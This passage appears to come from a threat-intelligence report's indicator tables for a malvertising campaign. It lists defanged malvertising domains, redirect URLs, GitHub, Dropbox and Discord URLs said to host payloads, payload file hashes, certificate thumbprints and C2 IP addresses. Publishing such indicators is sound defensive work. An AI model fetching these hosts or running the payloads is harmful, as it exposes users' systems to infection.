class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>&nbsp;<em>widiaoexhe[.]top<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Malvertising website domains<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td><em>widiaoexhe[.]top<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>predictivdisplay[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>buzzonclick[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>pulseadnetwork[.]com<\/em><\/td>\n<td>&nbsp;Domain<\/td>\n<\/tr>\n<tr>\n<td><em>onclickalgo[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>liveadexchanger[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>greatdexchange[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>dexpredict[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<tr>\n<td><em>onclickperformance[.]com<\/em><\/td>\n<td>Domain<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>GitHub referral URLs<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"27\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/pmpdm[.]com\/webcheck35\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/startherehosting[.]net\/todaypage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/kassalias[.]com\/pageagain\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/sacpools[.]com\/pratespage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>hxxps:\/\/dreamstorycards[.]com\/amzpage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/primetimeessentials[.]com\/newpagyes\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/perfect\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lakeplacidluxuryhomes[.]com\/webpage37<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/ageless-skincare[.]com\/gn\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/clarebrownmusic[.]com\/goodday\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/gn\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/compass-point-yachts[.]com\/nicepage77\/pro77.php<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/goodk\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lilharts[.]com\/propage6\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/enricoborino[.]com\/propage66\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/afterpm[.]com\/pricedpage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/eaholloway[.]com\/updatepage333\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/physicaltherapytustin[.]com\/webhtml\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/physicaltherapytustin[.]com\/web-X\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/razorskigrips[.]com\/newnewpage\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/statsace[.]com\/web_us\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>hxxps:\/\/nationpains[.]com\/safeweb3\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/vjav[.]com\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/thegay[.]com\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/olopruy[.]com\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/desi-porn[.]tube\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/cumpaicizewoa[.]net\/partitial\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/ak.ptailadsol[.]net\/partitial\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/egrowz[.]com\/webview\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/or-ipo[.]com\/nice\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>GitHub URLs<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"30\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/down4up\/<\/em><\/td>\n<td>&nbsp;URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/g1lsetup\/iln77<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/g1lsetup\/v2025<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/git2312now\/DownNew152\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/muhammadshahblis\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/Jimelecar<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/kloserw<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/kopersparan\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/zotokilowa<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/colvfile\/bmx84542<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/colvfile\/yesyes333<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/mp3andmovies\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/anatfile\/newl<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/downloadprov\/www<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/github[.]com\/abdfilesup\/readyyes<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/898537481<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/898072392\/&nbsp;<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/902107140<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/902405338<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/901430321\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/903047306\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/899121225<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/899472962\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/900979287\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/901553970<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/901617842\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/897657726<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/903499100\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/903509708\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/objects.githubusercontent[.]com\/github-production-release-asset-2e65be\/915668132\/<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>DropBox URL<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"2\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>&nbsp;<em>hxxps:\/\/uc8ce1a0cf2efa109cd4540c0c22.dl.dropboxusercontent[.]com\/cd\/0\/get\/CgHUWBzFWtX1ZE6CwwKXVb1EvW4tnDYYhbX8Iqj70VZ5e2uwYlkAq6V-xQcjX0NMjbOJrN3_FjuanOjW66WdjPHNw2ptSNdXZi4Sey6511OjeNGuzMwxtagHQe5qFOFpY2xyt1sWeMfLwwHkvGGFzcKY\/file?dl=1#&nbsp;<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Discord URL<\/strong><\/p>\n<figure class=\"wp-block-table 
table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1.5\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><em>hxxps:\/\/cdn.discordapp[.]com\/attachments\/1316109420995809283\/1316112071376769165\/NativeApp_G4QLIQRa.exe<\/em><\/td>\n<td>&nbsp;URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>First stage GitHub-hosted payloads<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"28\">\n<tr>\n<td><strong>Filename<\/strong><strong><\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NanoPhanoTool.exe<\/em><em><\/em><\/td>\n<td>cd207b81505f13d46d94b08fb5130ddae52bd1748856e6b474688e590933a718<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Squarel_JhZjXa.exe<\/em><em><\/em><\/td>\n<td>b87ff3da811a598c284997222e0b5a9b60b7f79206f8d795781db7b2abd41439<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PriceApp_1jth1MMk.exe<\/em><em><\/em><\/td>\n<td>ef2d8f433a896575442c13614157261b32dd4b2a1210aca3be601d301feb1fef<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Paranoide.exe<\/em><em><\/em><\/td>\n<td>5550ea265b105b843f6b094979bfa0d04e1ee2d1607b2e0d210cd0dea8aab942<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AliasApp.exe<\/em><em><\/em><\/td>\n<td>0c2d5b2a88a703df4392e060a7fb8f06085ca3e88b0552f7a6a9d9ef8afdda03<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>X-essentiApp.exe<\/em><em><\/em><\/td>\n<td>d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>QilawatProtone.exe<\/em><em><\/em><\/td>\n<td>823d37f852a655088bb4a81d2f3a8bfd18ea4f31e7117e5713aeb9e0443ccd99<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ElectronApp.exe<\/em><em><\/em><\/td>\n<td>588071382ac2bbff6608c5e7f380c8f85cdd9e6df172c5edbdfdb42eb74367dc<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>NativeApp_dRRgoZqi.exe<\/em><em><\/em><\/td>\n<td>dd8ce4a2fdf4af4d3fc4df88ac867efb49276acdcacaecb0c91e99110477dbf2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_G5L1NHZZ.exe<\/em><em><\/em><\/td>\n<td>380920dfcdec5d7704ad1af1ce35feba7c3af1b68ffa4588b734647f28eeabb7<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_86hwwNjq.exe<\/em><em><\/em><\/td>\n<td>96cc7c9fc7ffbda89c920b2920327a62a09f8cb4fcf400bbfb02de82cdd8dba1<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NativeApp_01C02RhQ.exe<\/em><em><\/em><\/td>\n<td>800c5cd5ec75d552f00d0aca42bdade317f12aa797103b9357d44962e8bcd37a<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>App_aeIGCY3g.exe<\/em><em><\/em><\/td>\n<td>afdc1a1e1e934f18be28465315704a12b2cd43c186fbee94f7464392849a5ad0<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Pictore.exe<\/em><em><\/em><\/td>\n<td>de6fcdf58b22a51d26eacb0e2c992d9a894c1894b3c8d70f4db80044dacb7430<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ScenarioIT.exe<\/em><em><\/em><\/td>\n<td>f677be06af71f81c93b173bdcb0488db637d91f0d614df644ebed94bf48e6541<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CiscoProton.exe<\/em><em><\/em><\/td>\n<td>7b88f805ed46f4bfc3aa58ef94d980ff57f6c09b86c14afa750fc41d32b7ada8<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Alarmer.exe<\/em><em><\/em><\/td>\n<td>dc8e5cae55181833fa9f3dd0f9af37a2112620fd47b22e2fd9b4a1b05c68620f<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AevellaAi.2.exe<\/em><em><\/em><\/td>\n<td>3e8ef8ab691f2d5b820aa7ac805044e5c945d8adcfc51ee79d875e169f925455<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>avs.exe<\/em><em><\/em><\/td>\n<td>d2e9362ae88a795e6652d65b9ae89d8ff5bdebbfec8692b8358aa182bc8ce7a4<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>mrg.exe<\/em><em><\/em><\/td>\n<td>113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>mrg.exe<\/em><em><\/em><\/td>\n<td>732b4874ac1a1d4326fc1d71d16910fce2835ceb87e76ad4ef2e40b1e948a6cc<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Application.exe<\/em><em><\/em><\/td>\n<td>aea0892bf9a533d75256212b4f6eaede2c4c9e47f0725fc3c61730ccfba25ec8<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Application.exe<\/em><em><\/em><\/td>\n<td>ea2e21d0c09662a0f9b42d95ce706b5ed26634f20b9b5027ec681635a4072453<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SalmonSamurai.exe<\/em><em><\/em><\/td>\n<td>83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Arendada.exe<\/em><em><\/em><\/td>\n<td>47ef2b7e8f35167fab1ecdd5ddb73d41e40e6a126f4da7540c1c0394195cb3df<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Arduino.exe<\/em><em><\/em><\/td>\n<td>92d457b286fb63d2f5ec9413fd234643448c5f8d2c0763e43ed5cf27ab47eb02<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SecondS.exe<\/em><em><\/em><\/td>\n<td>9d5c551f076449af0dbd7e05e1c2e439d6f6335b3dd07a8fa1b819c250327f39<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ultraedit.msi<\/em><em><\/em><\/td>\n<td>0e20bea91c3b70259a7b6eef3bff614ce9b6df25e078bc470bfef9489c9c76e6<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>First-stage Dropbox-hosted payload<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Filename<\/strong><strong><\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>App_File-x38.3.exe<\/em><em><\/em><\/td>\n<td>c0bc1227bdc56fa601c1c5c0527a100d7c251966e40b2a5fa89b39a2197dda67<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>First-stage Discord-hosted payload<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Filename<\/strong><strong><\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>NativeApp_G4QLIQRa.exe<\/em><em><\/em><\/td>\n<td>87200e8b43a6707cd66fc240d2c9e9da7f3ed03c8507adf7c1cfe56ba1a9c57d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Certificate signatures of GitHub-hosted payloads<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"11\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>c855f7541e50c98a5ae09f840fa06badb97ab46c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>94c21e6384f2ffb72bd856c1c40b788f314b5298<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>74df2582af3780d81a8071e260c2b04259efc35a<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>07728484b1bb8702a87c6e5a154e0d690af2ff38<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>901f3fe4e599cd155132ce2b6bf3c5f6d1e0387c<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>be7156bd07dd7f72521fae4a3d6f46c48dd2ce9e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>686b7ebba606303b5085633fcaa0685272b4d9b9<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>74a8215a54f52f792d351d66bd56a0ac626474fb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>561620a3f0bf4fb96898a99252b85b00c468e5af<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>8137f599ac036b0eaae9486158e40e90ebdbce94<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>E9007755cfe5643d18618786de1995914098307f<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Certificate signature of Dropbox-hosted payload<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>&nbsp;fa6146f1fdad58b8db08411c459cb70acf82846d<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Second-stage payloads<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"24\">\n<tr>\n<td><strong>File name<\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>NanoTool.exe<\/em><\/td>\n<td>9f958b85dc42ac6301fe1abfd4b11316b637c0b8c0bf627c9b141699dc18e885<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Squarel.exe<\/em><\/td>\n<td>29539039c19995d788f24329ebb960eaf5d86b1f8df76272284d08a63a034d42<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ParanoidResolver.exe<\/em><\/td>\n<td>1f73a00b5a7ac31ffc89abbedef17ee2281cf065423a3644787f6c622295ff29<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AliasInstall.exe<\/em><\/td>\n<td>997671c13bb78a9acc658e2c3a1abf06aedc4f1f4f1e5fd8d469a912fc93993b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>IoNixNginx.exe<\/em><\/td>\n<td>1d8ab53874b2edfb058dd64da8a61d92c8a8e302cc737155e0d718dbe169ba36<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>QilawatProton.exe&nbsp;<\/em><\/td>\n<td>885f8a704f1b3aaa2c4ddf7eab779d87ecb1290853697a1e6fb6341c4f825968<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ProtonEditor.exe<\/em><\/td>\n<td>48f422bf2b878d142f376713a543d113e9f964f6761d15d4149a4d71441739e5<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AlEditor.exe&nbsp;<\/em><\/td>\n<td>9daa63046978d7097ea20bfbb543d82374cf44ba37f966b87488f63daf20999e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Scielfic.exe<\/em><\/td>\n<td>6ec86b4e200144084e07407200a5294985054bdaddb3d6c56358fc0657e48157<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Pictore.exe<\/em><\/td>\n<td>18959833da3df8d5d8d19c3fce496c55aa70140824d3a942fe43d547b9a8c065<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AlarmWalker Solid.exe<\/em><\/td>\n<td>552f23590bdf301f481e62a9ce3c279bab887d64f4ba3ea3d81a348e3eff6c45<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Aevella.exe&nbsp;<\/em><\/td>\n<td>2a738f41b42f47b64be7dc2d16a4068472b860318537b5076814891a7d00b3bb<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Application.exe<\/em><\/td>\n<td>5b50d0d67db361da72af2af20763b0dde9e5e86b792676acb9750f32221e955c<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td><em>ArchiverApp.exe<\/em><\/td>\n<td>cfeac95017edbfe9a0ad8f24e7539f54482012d11dc79b7b6f41ff4ff742d9c6<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>LakerBaker.exe<\/em><\/td>\n<td>af7454ca632dead16a36da583fb89f640f70df702163f5a22ba663e985f80d88<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>NanoTool.exe<\/em><\/td>\n<td>efdcd37ee0845e0145084c2a10432e61b1b4bf6b44ecd41d61a54b10e3563650<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DisplayPhotoViewer.exe<\/em><\/td>\n<td>86ae0078776c0411504cf97f4369512013306fcf568cc1dc7a07e180dde08eda<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>CheryLady Application.exe<\/em><\/td>\n<td>773d3cb5edef063fb5084efcd8d9d7ac7624b271f94706d4598df058a89f77fd<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SalmonSamurai.exe<\/em><\/td>\n<td>40abba1e7da7b3eaad08a6e3be381a9fc2ab01b59638912029bc9a4aa1e0c7a7<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Heaveen Application.exe<\/em><\/td>\n<td>39dbf19d5c642d48632bfaf2f83518cfbd2b197018642ea1f2eb3d81897cf17d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Cisco Application.exe<\/em><\/td>\n<td>234971ecd1bf152c903841fac81bdaa288954a2757a73193174cde02fa6f937b<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Simplify.exe<\/em><\/td>\n<td>221615de3d66e528494901fb5bd1725ecda336af33fe758426295f659141b931<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>SecondS.tmp<\/em><\/td>\n<td>5185f953be3d0842416d679582b233fdc886301441e920cb9d11642b3779d153<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Second-stage C2s<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table 
class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>159.100.18[.]192<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr>\n<td>192.142.10[.]246<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr>\n<td>79.133.46[.]35<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>84.200.24[.]191<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>84.200.24[.]26<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>89.187.28[.]253<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr>\n<td>185.92.181[.]1<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>188.245.94[.]250<\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Third-stage payloads: <em>.exe<\/em> and PowerShell files<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"55\">\n<tr>\n<td><strong>File name<\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ApproachAllan.exe<\/em><\/td>\n<td>4e5fafffb633319060190a098b9ea156ec0243eb1279d78d27551e507d937947<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>DiscoConvicted.exe<\/em><\/td>\n<td>008aed5e3528e2c09605af26b3cda88419efb29b85ed122cab59913c18f7dc75<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>AwesomeTrader.exe<\/em><\/td>\n<td>21d4252a6492270f24282f8de9e985c9b8c61412f42d169ff4b128fd689d4753<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CiteLips.exe<\/em><\/td>\n<td>c9713c06526673bf18dbdaf46ea61ca9dd8fefe8ceec3be06c63db17e01e3741<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>RepublicChoir.exe<\/em><\/td>\n<td>f649f66116a3351b60aa914e0b1944c2181485b1cf251fc9c1f6dab8a9db426b<\/td>\n<\/tr>\n<tr 